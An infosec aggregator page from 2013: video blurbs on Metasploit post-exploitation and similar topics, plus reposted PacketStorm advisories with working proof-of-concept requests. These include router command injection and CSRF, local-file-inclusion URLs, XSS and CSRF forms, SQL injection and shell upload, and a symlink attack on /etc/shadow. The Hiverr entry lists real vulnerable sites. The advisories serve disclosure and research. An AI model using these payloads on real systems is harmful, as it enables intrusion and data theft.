Praetorian503

Description: We as a global society are extremely vulnerable and at risk for a catastrophic cyber event. Global society needs the best and brightest to help secure our most valued resources in cyberspace: our intellectual property, our critical infrastructure and our privacy. DEF CON has an important place in computer security. It taps into a broad range of talent and provides an unprecedented diversity of experiences and expertise to solve tough problems. The hacker community and USG cyber community share some core values: we both see the Internet as an immensely positive force; we both believe information increases in value by sharing; we both respect protection of privacy and civil liberties; we both believe in the need for oversight that fosters innovation, doesn't pick winners and losers, and retains freedom and flexibility; we both oppose malicious and criminal behavior. We should build on this common ground because we have a shared responsibility to secure cyberspace. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Shared Values, Shared Responsibility

Description: First of all we love SpeedTest.net. Even with its Flash-based War Games effects, it’s still our goto site when investigating slow network connections. That’s why we were a little taken aback when we discovered an Invincea blog post noting that our beloved site being involved in exploiting visitors using one of the recent Java vulnerabilities. The main theme behind the Invincea post wasn’t necessarily their browser sandboxing product per se (although it does look helpful) but more on emphasizing “that the highest concentration of online security threats are in fact legitimate destinations visited by mass audiences.” In the detailed post Eddie Mitchell analyzes the attack on SpeedTest.net. One of the key findings was that the popular site didn’t actually host any Java exploit code but simply redirected visitors to another site that did. Source : - https://www.novainfosec.com/2013/02/05/speedtest-net-pushing-java-exploit/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Popular Site Speedtest.Net Compromised By Exploit And Pushing Java Exploit

Description: In this video I will show you how to use Railgun for creating a file and modifying in it using irb shell. If this functions is not available in your Metasploit directory then you need to defined manually or just update your framework. There are lots of tricks available for exploiting a system using railgun. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post - Exploitation Railgun File Creation And Beep

Description: In this video I will show you how to edit file creation data time using metasploit Timestomp. Using Timestomp we can change MACE value of file (Modified-Accessed-Created-Entry). You can Change Created , Modified and Accessed date-time. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Post --Exploitation -- Metasploit Timestomp

Description: When there's no technical vulnerability to exploit, you should try to hack what humans left for you, and believe me, this always works. Scylla provides all the power of what a real audit, intrusion, exclusion and analysis tool needs, giving the possibility of scanning misconfiguration bugs dynamically. Scylla aims to be a better tool for security auditors, extremely fast, designed based on real scenarios, developed by experienced coders and constructed with actual IT work methods. The words "Configuration Tracer" are the best definition for Scylla, a tool to help on IT audits. Sergio 'flacman' Valderrama has been a coder and hacker since he was in school (15 Years old?). Consulting Manager of 2Secure S.A.S, he has worked as security consultant for more than 6 years. Founder of ColombiaUnderground Team, he studied Computer Engineer at the Universidad de los Andes... (lot of non interesting crap about titles and experience). And of course, he's the main developer of Scylla. Carlos Alberto Rodriguez is Co-Founder at 2Secure, a Colombia-based company that provides specialized security services for multiple sector companies. Senior Developer focused in security development with emphasis in cryptographic algorithms, Senior Security Consultant, R&D Manager and Security Applications Leader for 2Secure with over 7 years of experience in security and incident handling. Twitter: @_S_aint_Iker Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Scylla: Because There's No Patch For Human Stupidity

Linksys models E1500 and E2500 suffer from cross site request forgery, cross site scripting, OS command injection, and directory traversal vulnerabilities. Device Name: Linksys E1500 / E2500 Vendor: Linksys ============ Device Description: ============ The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files. The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page. Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=... ============ Vulnerable Firmware Releases - e1500: ============ Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011 Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012 Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012 ============ Vulnerable Firmware Releases - e2500: ============ Firmware Version: v1.0.03 (only tested for known OS command injection) Other versions may also be affected. ============ Shodan Torks ============ Shodan Search: linksys e1500 Shodan Search: linksys e2500 ============ Vulnerability Overview: ============ * OS Command Injection / E1500 and E2500 v1.0.03 => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26 The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands. Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Diagnostics.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 185 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip= Change the request methode from HTTP Post to HTTP GET makes the exploitation easier: http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip= Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png * Directory traversal - tested on E1500: => parameter: next_page Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device. Request: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 75 submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version Response: HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png * For changing the current password there is no request of the current password - tested on E1500 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. Example Request: POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Management.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 311 submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * Reflected Cross Site Scripting - tested on E1500 => Parameter: wait_time=3'%3balert('pwnd')// Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input. Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 300 submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png * Redirection - tested on E1500 => Paramter: submit_button=http://www.pwnd.pwnd%0a Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input. Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 290 submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-004 Twitter: @s3cur1ty_de ============ Time Line: ============ October 2012 - discovered vulnerability 21.10.2012 - contacted Linksys with vulnerability details 23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1 27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1 27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1 29.10.2012 - Linksys responded with case number 13.11.2012 - /me requested update of the progress 15.11.2012 - Linksys sends Beta Agreement 16.11.2012 - Linksys sends the Beta Firmware for testing 16.11.2012 - tested Beta version 18.11.2012 - informed Linksys about the results 30.11.2012 - reported the same OS Command injection vulnerability in model E2500 10.12.2012 - /me requested update of the progress 23.12.2012 - Update to Linksys with directory traversal vulnerability 09.01.2013 - Case closed 05.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm

ezStats for Battlefield 3 version 0.91 suffers from cross site scripting and local file inclusion vulnerabilities. ################################################# ### Exploit Title: ezStats for Battlefield 3 v0.91 Multiple Vulnerabilities ### Date: 02/05/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.ezstats.org/ ### Software Link: http://ezstats.googlecode.com/files/ezStats2_BF3_v0.91.zip ### Tested on: Linux/Windows ################################################# 1- Local File Inclusion : http://127.0.0.1/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg http://127.0.0.1/ezStats2/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg 2- XSS : http://127.0.0.1/ezStats2/compare.php?common=[XSS] http://127.0.0.1/ezStats2/compare.php?rankings=[XSS] ############################################ # Notes : 1- Must be magic_quotes_gpc = Off 2- phpinfo() : http://127.0.0.1/ezStats2/admin/apitest.php?info # Greetz to my friendz Source: PacketStorm

ezStats2 for Playstation Network version 1.10 suffers from a local file inclusion vulnerability. ################################################# ### Exploit Title: ezStats2 for Playstation Network v1.10 Local File Inclusion Vulnerability ### Date: 02/05/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.ezstats.org/ ### Software Link: http://ezstats.googlecode.com/files/ezStats2_PSN_v1.10.zip ### Tested on: Linux/Windows ################################################# http://127.0.0.1/ezStats2_psn/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg http://127.0.0.1/ezStats2_psn/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg ############################################ # Notes : 1- Must be magic_quotes_gpc = Off 2- phpinfo() : http://127.0.0.1/psn/admin/apitest.php?info # Greetz to my friendz Source: PacketStorm

ezStats2 Serverviewer version 0.62 suffers from a local file inclusion vulnerability. ################################################# ### Exploit Title: ezStats2 Serverviewer v0.62 Local File Inclusion Vulnerability ### Date: 02/05/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.ezstats.org/ ### Software Link: http://ezstats.googlecode.com/files/ezStats2_Serverviewer_v0.62.zip ### Tested on: Linux/Windows ################################################# http://127.0.0.1/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg http://127.0.0.1/ezServer/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg ############################################ # Notes : 1- Must be magic_quotes_gpc = Off 2- phpinfo() : http://127.0.0.1/ezServer/admin/apitest.php?info # Greetz to my friendz Source: PacketStorm

ezStats2 for Medal of Honor Warfighter version 1.0 suffers from a local file inclusion vulnerability. ################################################# ### Exploit Title: ezStats2 for Medal of Honor Warfighter v1.0 Local File Inclusion Vulnerability ### Date: 02/05/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.ezstats.org/ ### Software Link: http://ezstats.googlecode.com/files/ezStats2_MoHW_v1.0a.zip ### Tested on: Linux/Windows ################################################# http://127.0.0.1/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg http://127.0.0.1/ezStats2_mohw/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg ############################################ # Notes : 1- Must be magic_quotes_gpc = Off 2- phpinfo() : http://127.0.0.1/ezStats2_mohw/admin/apitest.php?info # Greetz to my friendz Source: PacketStorm

Lorex LNC116 and LNC104 IP cameras only perform basic authentication on the main login page. If you perform direct browsing to any other interface, you are not forcibly authenticated. Product: Lorex LNC116 and LNC104 IP Cameras Vendor: LOREX Technology Inc. Vulnerability Type: Authentication Bypass Vulnerable Firmware Version(s): 030312 and earlier Tested Firmware Version: 030312 Fixed Firmware Version: 030405 Solution Status: Fixed by Vendor Vendor Notification: December 22, 2012 Public Disclosure: February 5, 2013 CVE Reference: CVE-2012-6451 Credit: Jason Doyle / Twitter @jasond0yle Advisory Details: The camera’s web interface uses HTTP Basic for authentication, but authentication details are only validated on the home login page. By forced browsing, or navigating directly to any valid URL on the web interface other than the homepage, it is possible to bypass authentication. Risk: It's possible to view the live video feed and/or change all configurable settings anonymously. Proof of Concept: Navigate directly to http://x.x.x.x/cgi-bin/display.cgi to view the camera’s live video feed anonymously. Solution: Upgrade to firmware version 030405. Source: PacketStorm

Cisco Unity suffers from cross site request forgery and cross site scripting vulnerabilities. # Exploit Title: Cisco Unity Express Multiple Vulnerabilities # Reported: December 2012 # Disclosed: February 2013 # Author: Jacob Holcomb of Independent Security Evaluators # CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120 # http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html Cisco Advisory http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120 Proof of Concept XSS - CVE-2013-1114: GET: Reflective XSS & Info disclosure http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script> Information Disclosure Location: /Web/WEB-INF/screens/main.jsp Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp Internal Servlet Error: javax.servlet.ServletException: invalid character at position 1 in > org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source) WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source) org.apache.jasper.runtime.PageContextImpl.include (Unknown Source) WEB_0002dINF.screens.main._jspService (main.java:396) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source) org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759) org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596) com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157) org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492) javax.servlet.http.HttpServlet.service (HttpServlet.java) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.core.ContextManager.internalService (Unknown Source) org.apache.tomcat.core.ContextManager.service (Unknown Source) org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source) org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source) org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source) java.lang.Thread.run (Thread.java:777) Root cause: java.lang.NumberFormatException: invalid character at position 1 in > java.lang.Throwable. (Throwable.java:166) java.lang.Integer.parseInt (Integer.java:775) java.lang.Integer.parseInt (Integer.java:262) com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274) WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source) org.apache.jasper.runtime.PageContextImpl.include (Unknown Source) WEB_0002dINF.screens.main._jspService (main.java:396) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source) org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759) org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596) com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157) org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492) javax.servlet.http.HttpServlet.service (HttpServlet.java) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.core.ContextManager.internalService (Unknown Source) org.apache.tomcat.core.ContextManager.service (Unknown Source) org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source) org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source) org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source) java.lang.Thread.run (Thread.java:777) POST: Persistent XSS http://X.X.X.X/Web/SA3/AddHoliday.do POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD CSRF - CVE-2013-1120: <html> <!-- # Exploit Title: Cisco Unity Express CSRF # Date: Discovered and reported December 2012 # Disclosed: February 2013 # Author: Jacob Holcomb of Independent Security Evaluators # Software: Cisco Unity Express # CVE : CVE-2013-1120 for the CSRF # Note: All the HTML forms are susceptible to forgery --> <head> <title>Reload Cisco Unity Express CSRF</title> </head> <body> <form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post"> <input type="hidden" name="submitType" value="RELOAD"/> </form> <script> document.CUEreload.submit(); </script> </body> </html> Source: PacketStorm

Hiverr version 2.2 suffers from remote shell upload, information disclosure, and remote SQL injection vulnerabilities. # Exploit Title: Hiverr v2.2 Multiple Vulnerabilities # Date: 05.02.2013 # Author: xStarCode # Exploit Author: xStarCode # Version: 2.2 # Category: webapps # Google Dork: * # Tested on: Linux # Exploit: -----Index Vulnerabilities: ==> SQL Injections http://localhost/gig_desc.php?No=-13+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11-- http://localhost/categorygigs.php?category=-0+UNION+SELECT+1,version(),3,4,5,6,7-- http://localhost/categorygigs.php?category=&mny=-100+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11-- <== -----User Panel Vulnerabilities: ==> SQL Injection http://localhost/inbox_detail.php?userid=31&recpid=31&gig=-15+UNION+SELECT+1,2,3,version(),5,6,7,8-- <== -----Multiple Shell Upload: ==> Go to http://localhost/profilesetting.php And upload a PHP Shell to "Profile Image" View source: <img src="profileimage/*****SHELL*****_.php" alt="image" height="100" width="100"> Go to http://localhost/profileimage/*****SHELL*****_.php <== next - ==> Go to "Greate Gig" http://localhost/addnewgig.php And upload a PHP Shell to "Add Image" View source: <td width="107"> <img src="gigimages/*****SHELL*****_.php" height="76" width="106"> </td> Go to http://localhost/gigimages/*****SHELL*****_.php <== -----PHP Info Leak: ==> Go to http://localhost/nitintest.php <== # Demo sites: http://trabajoenlinea.net/ http://aramar.jp/ http://www.seostinger.com/ # ______ Xo | | / | \ ;_/,X_,\_; \._/x x\_./ \_./(:\._/ ___ xStarCode # Author Mail: xstarcode@vpn.st Author Website: www.xstarcode.wordpress.com # Source: PacketStorm

Oracle Auto Service Request creates files insecurely in /tmp using time stamps instead of mkstemp(). Due to this, it is possible to clobber root owned files and possibly cause a denial of service condition or worse. Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility. [larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done root executes the asr command: [root@oracle-os-lab01 bin]# ./asr register OR register [-e asr-manager-relay-url]: register ASR unregister : unregister ASR show_reg_status : show ASR registration status test_connection : test connection to Oracle . . . version : show asr script version exit help : display a list of commands ? : display a list of commands asr> /etc/shadow is now overwritten with the contents of /tmp/status1_020213003722 root # cat /etc/shadow id State Bundle 68 ACTIVE com.sun.svc.asr.sw_4.3.1 Fragments=69, 70 69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1 Master=68 70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1 Master=68 72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0 Fragments=73 73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0 Master=72 67 ACTIVE com.sun.svc.ServiceActivation_4.3.1 Source: PacketStorm

The Sony Playstation Vita browser that is in firmware version 2.05 suffers from an addressbar spoofing vulnerability. [MajorSecurity-SA-2013-014]Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing Details ============= Product: Sony Playstation Vita Browser - firmware 2.05 CVE-ID: CVE-2013-XXXX Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://de.playstation.com/psvita/ Advisory-Status: published Credits ============= Discovered by: David Vieira-Kurz of MajorSecurity original advisory: http://majorsecurity.com/psvita/sa-2013-014-en.php Affected Products ============= Sony Playstation Vita Browser ( Firmware: 2.05 ) Prior versions may also be affected Product Description ============= "Playstation Vita is the new handheld of Sony." Vulnerability Details ============= David Vieira-Kurz has discovered some vulnerabilities in Sony PS Vita based on firmware 2.05 . The weakness is caused due to an error within the handling of URLs when using javascript's window.open() method. This can be exploited to potentially trick users into supplying sensitive information to a malicious web site, because information displayed in the address bar can be constructed in a certain way, which may lead users to believe that they're visiting another web site than the displayed web site. Steps to reproduce ============= 1) Visit http://majorsecurity.com/psvita/psvita-demo.html with a PS Vita with firmware 2.05 installed 2) click the "demo" button 3) The web browser will open a new window with "http://de.playstation.com/psvita/" in the adress bar, but in fact "http://de.playstation.com/psvita/" is being displayed inside an iframe within the host http://www.majorsecurity.com Proof of Concept ============= A proof-of-concept code is available here: http://de.playstation.com/psvita/ Solution ============= Users should upgrade to a newer version as far as the vendor has supplied a patch. Timeline ================ 2013-01-20, vulnerability identified 2013-01-20, vulnerability reproduced with firmware 2.05 2013-01-20, vendor has been informed 2013-01-27, vendor has been informed once again 2013-01-29, advisory published with partially details 2013-02-05, advisory published with full details and poc Use of terms ================ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact us for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall MajorSecurity be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if MajorSecurity has been advised of the possibility of such damages. ------------------------- PROOF OF CONCEPT CODE -------------------------- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html> <head><title>Sony PS Vita - firmware 2.05 - address bar spoofing</title> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <!-- Copyright 2013 David Vieira-Kurz and MajorSecurity GmbH --> </head> <body><h1>Sony PS Vita - firmware 2.05 - address bar spoofing</h1> <li>Please click the button to run the proof of concept. <button id="one">Demo</button></li> <script type="text/javascript"> document.getElementById('one').onclick = function() { myWindow=window.open('http://de.playstation.com/psvita/','Playstation Vita, PS Vita','width=200,height=100,location=yes'); myWindow.document.write("<html><head></head><body><b>This page is still being hosted on majorsecurity.com, but the address bar is pointing to another domain.</b><br><br><iframe src=\"http://de.playstation.com/psvita/\");></iframe></scri+pt></body></html>"); myWindow.focus(); return false; } </script> </body> </html> Source: PacketStorm

